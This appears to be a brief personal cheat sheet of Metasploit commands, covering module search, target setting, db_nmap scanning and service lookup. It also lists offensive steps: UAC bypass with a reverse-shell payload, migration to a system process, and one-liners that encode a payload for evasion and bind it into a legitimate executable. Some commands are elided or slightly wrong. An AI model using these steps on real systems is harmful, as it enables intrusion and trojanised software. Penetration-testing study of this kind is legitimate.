Tool metasploit

General Commands:

show auxilary
search snmp
use snmp_enum
info
show options
set RHOS ip
run
setg RHOST ip (global set)

Hosts:

db_nmap ip-range --top-ports 20 (to populate database)

Search Services:

services -p 443 (search all machines with 443 open)

Modifying exploit:

~/.msf4/modules/exploits/windows/misc/vulnserver.rb

Post exploitation - exploit/windows/local/bypassuac - set payload to reverse-shell (so that a new session will be created) - migrate to a system privileged process

Encode

msfpayload ............ | msfconsole -e x86/shikata_ga_nai -t exe -c 9 -o exe.exe

Binding

msfpayload ............ | msfconsole -e x86/shikata_ga_nai -t exe -c 9 -x goodexe.exe -o bound.exe